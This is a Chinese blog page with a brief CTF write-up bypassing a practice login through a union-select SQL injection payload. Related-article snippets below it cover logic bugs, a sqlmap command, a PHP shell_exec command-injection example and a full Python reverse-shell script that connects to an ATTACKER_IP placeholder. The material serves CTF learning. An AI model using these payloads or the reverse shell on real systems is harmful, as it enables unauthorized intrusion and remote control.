ctf实验吧逻辑问题

CTF PHP注入绕过实战
最新推荐文章于 2025-07-11 23:22:59 发布
原创 最新推荐文章于 2025-07-11 23:22:59 发布 · 296 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过ctf5.shiyanbar.com/web/5/index.php的PHP题目,详细解析了如何利用SQL注入技巧绕过登录验证。通过分析源码和URL输入,揭示了后台逻辑并展示了如何构造特定的SQL语句使$row[pw]与加密的password相等,成功实现绕过。

ctf5.shiyanbar.com/web/5/index.php
绕开。
php题,习惯先看源码,F12,结果发现了
在这里插入图片描述
url输入了一看
在这里插入图片描述
告诉了我们后台逻辑。分析一下,发现只要使得$row[“pw”]和加密的password相等就好了,就莫名想到了注入了,因为开头试了试加’,在这里插入图片描述
账号输入这个,xxx’ and 0=1 union select “密码的md5值” # ,绕开了用户名
在这里插入图片描述
这是成功后的

浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1589
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
从0到1CTFer成长之路-第三章-逻辑漏洞
黑白的博客
03-18 2054
声明 好好向大佬们学习!!! 攻击 逻辑漏洞 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://3e95fcac-6f75-4037-82c4-b13e38bb3220.node3.buuoj.cn 是个炫酷的登录页面,本来还以为是通过任意用户注册,或者Session等,谁知道直接点提交,就能登进去买书 点击提交后,看到了买书的页面 映入眼帘的三本书 第一本flag,2000块
xctf-bug(绕过)
qq_37027540的博客
10-07 800
基于逻辑漏洞文件上传绕过的ctf 题目的网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4768&page=1 打开页面就出现弹窗说需要登录 我首先的思路就是会不会有弱口令,或者是存在sql注入,使用sqlmap进行扫描,没有发现注入点 只能先注册一下账号,进入查看一...
BUUCTF [第三章 web进阶]逻辑漏洞
m0_49025459的博客
04-21 1545
这个就很离谱,我们直接购买FLAG我们发现钱不够 但是url上显示了支付的钱和商品数,连抓包都不用,直接将这个cost修改成负的就行了
程序逻辑问题CTF
qq_22192367的博客
03-19 805
题目链接:http://ctf5.shiyanbar.com/web/5/index.php 有提示是绕过,打开题目,可以看到是个登陆问题,尝试抓包修改source值没什么效果 于是尝试查看源代码发现index.txt链接,打开发现是php后台代码,看来是个代码审计问题 代码大意:判断输入是否为空;将pass值进行md5加密后赋给pass变量;从php数据库中查询user用户的p...
实验ctf
四盘山博客
07-25 3388
1/登陆一下好吗??http://ctf5.shiyanbar.com/web/wonderkun/web/index.html =' =' ctf{51d1bf8fb65a8c2406513ee8f52283e7} 2/who are you ? http://ctf5.shiyanbar.com/web/wonderkun/index.php import requests impor
ctf 选择题 题库_实验CTF题库-WEB题(部分)
weixin_39613548的博客
12-19 1352
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
精选资源
Imaginary CTF 2022 真题
08-01
每个子文件夹(如"Reversing", "Forensics"等)都可能包含一系列相关的问题,每个问题可能提供一个谜题、一段代码、一个文件或一个链接,参赛者需要通过解谜、分析和实验来解决问题,从而获取得分。通过参与...
【总结】逻辑运算在Z3中运用+CTF习题
蚁景网安学院
07-17 1087
国际赛IrisCTF在前几天举办,遇到了一道有意思的题目,特来总结。题目并不是很难,没有复杂的ollvm混淆也没有复杂的加密,但是却一步一步引导我们去学习和总结。
CTF实验吧-WEB专题-5
qq_18661257的专栏
12-22 6150
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
Web安全测试中常见逻辑漏洞解析(实战篇)
04-05
通过实战解释在web安全测试中经常会遇到的一些逻辑漏洞
ctf的php,CTF中常见的PHP漏洞介绍(图文总结)
weixin_42636454的博客
03-09 1388
本篇文章给大家带来的内容是关于CTF中常见的PHP漏洞介绍(图文总结)),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。平常也遇到不少这样的题目,记性不好很容易忘,于是好好总结一下加深记忆!!!一. md5()漏洞,php在处理哈希字符串时会利用”!=”或” ==”来对哈希值进行比较,它把每一个以” 0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希...
逻辑缺陷漏洞
san3144393495的博客
04-19 127
箭头指向的后面跟着的数字就是购买数字1,而我们可以把1改成 -1在放包之后,因为买的东西是-1个支付金额不能为负数就显示0.00元。打开测试网站,然后选好商品,在开启burp抓包软件进行抓包。
技巧分享:一道关于重置密码逻辑漏洞的CTF
KEY0NE的个人博客
02-18 812
起因在i春秋社区论坛看到一篇帖子:【逻辑漏洞】挑战你的思维方式 ,作者@sqler分享了他解决问题的思路,很清晰明了,值得点赞~本次想分享一个更快捷的思路以供参考。开始目标站点:http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/index.php突破点就在于忘记密码的逻辑处理了抓包...
BJDCTF-文件探测-ssrf+逻辑漏洞
qq_42188168的博客
03-24 487
一、ssrf 信息收集了一波,发现home.php这个hint以及admin.php,访问 随后用伪协议读取system.php的源码和 <?php error_reporting(0); if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){ echo "<script>al...
CTF-PWN之fsp-utilize漏洞利用
BadRer的博客
06-11 768
写在前面:总结一下这次比赛的收获吧。其他方面的收获就不多说了。主要还是说说比赛的事。总共20道题也就一题是pwn..一开始不会做,经过师傅的点播之后,最终拿到shell。这道题就是一个很小的一个知识点,不过真佩服师傅老人家,咔!咔!咔!不到20分钟就做完了。贼溜!上题!!! 老规矩。先检查(其实无所谓啦,这几步是必做的工作)。 看到这个就要兴奋一下了。几乎啥保护都没开。直接溢出整段shel
二进制漏洞入门:栈溢出与格式化字符串的 CTF 玩法
最新发布
m0_57836225的博客
07-11 511
查保护:用checksec确定程序开启的保护机制(NX/Canary/PIE)。找漏洞:通过反编译(IDA/Ghidra)定位危险函数(getsprintf无参)。算偏移:用cyclic计算栈溢出长度,或确定格式化字符串参数偏移。定策略NX 关闭:直接写 shellcode。NX 开启:ret2libc 或 ROP。Canary 开启:先泄露 Canary。写 exp:用pwntools构造 payload,调试并获取 shell。
神来之笔,2021CTF内核漏洞精选解析
kali_Ma的博客
07-13 820
CTF解析0x0 保护0x1 源码分析0x2 漏洞点0x3 利用思路0x4 Exploit 0x0 保护 #!/bin/sh qemu-system-x86_64 \ -m 512M \ -kernel bzImage \ -nographic \ -smp 1 \ -cpu kvm64,+smep,+smap \ -append "console=ttyS0 quiet kaslr" \ -initrd rootfs.cpio \ -mo
CTFHub-web ssrf漏洞(2)
l2772513700的博客
03-09 438
需要我们用gopher协议去用post key到flag.php不过需要注意的是要从127.0.0.1发送数据。bp抓包数据把不要的删除。
ctf的反弹shell题
02-28
### CTF竞赛中的反弹Shell解题方法与技巧 #### 识别Webshell并获取敏感信息 在CTF比赛中,通常会提供一个网络流量捕获文件(如`hack.pcap`),其中包含了攻击者与服务器之间的通信记录。为了找到用于登录系统的密码或其他重要凭证,可以通过Wireshark工具打开此`.pcap`文件,并运用过滤器来定位特定协议下的关键字[^2]。 对于给定的例子,在Wireshark中执行如下操作: 1. 打开`hack.pcap`; 2. 使用过滤条件`tcp contains "password"`查找包含密码字段的数据包; 3. 对选定的数据包应用更精确的时间序列筛选,例如`tcp.stream eq X` (X为具体流编号),以便聚焦于单一会话内的交互细节; 4. 查看载荷部分并通过字符串搜索功能直接检索明文形式存在的认证凭据——这里发现的管理员账户密码即为`Admin123!@#`。 #### 利用已知漏洞实施远程命令执行(RCE) 当面对可能存在RCE风险的应用程序时,尤其是那些允许用户提交未经充分验证或转义处理过的输入参数的服务端逻辑缺陷场景下,应当谨慎评估其安全性边界[^4]。如果确认目标环境确实存在这样的安全隐患,则下一步就是精心构建能够触发该机制的有效负载(payload)。 考虑到题目背景提到的是基于PHP编写的CMS平台,那么可以尝试构造恶意请求以调用诸如`exec()`、`shell_exec()`或是其他类似的底层操作系统接口函数来进行任意指令注入测试: ```php <?php // 假设这是来自用户的可控变量 $input = $_GET['cmd']; // 危险做法:未加任何防护措施就将其作为系统调用的一部分 $output = shell_exec($input); echo $output; ?> ``` 上述代码片段展示了如何不当使用这些内置函数可能会带来严重的后果。然而,在实际比赛环境中,应该遵循道德准则仅限于合法授权范围内的实验活动。 #### 实施反弹Shell连接建立过程 一旦成功实现了对受害主机上运行进程的部分控制权之后,就可以考虑部署一种持久化的反向Shell组件了。这一步骤涉及将事先准备好的payload上传至远端站点目录结构内某处可公开访问的位置,并通过浏览器或者其他HTTP客户端发送相应请求激活它[^3]。 下面是一个简化版的Python脚本来模拟创建这样一个监听服务的过程: ```python import socket import subprocess import os def connect_back(ip, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, int(port))) while True: command = s.recv(1024).decode() if 'terminate' in command.lower(): break output = subprocess.getoutput(command) s.send(output.encode()) except Exception as e: print(f"Error occurred: {e}") finally: s.close() if __name__ == "__main__": attacker_ip = "ATTACKER_IP" attacker_port = "PORT_NUMBER" connect_back(attacker_ip, attacker_port) ``` 请注意替换掉示例中的占位符(`ATTACKER_IP`, `PORT_NUMBER`)为真实的数值之前先确保已经获得了适当权限许可! #### 数据包分析辅助排查异常行为 在整个过程中还应充分利用抓包技术监控整个会话期间产生的所有双向传输内容,特别是关注是否存在可疑模式匹配项,比如常见的SSH/Telnet登录提示词“login”,或者是FTP/SMB等常见文件共享协议里的身份验证交换环节。借助像`tshark`这类强大的命令行版本嗅探器可以帮助快速锁定感兴趣的事件实例[^5]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值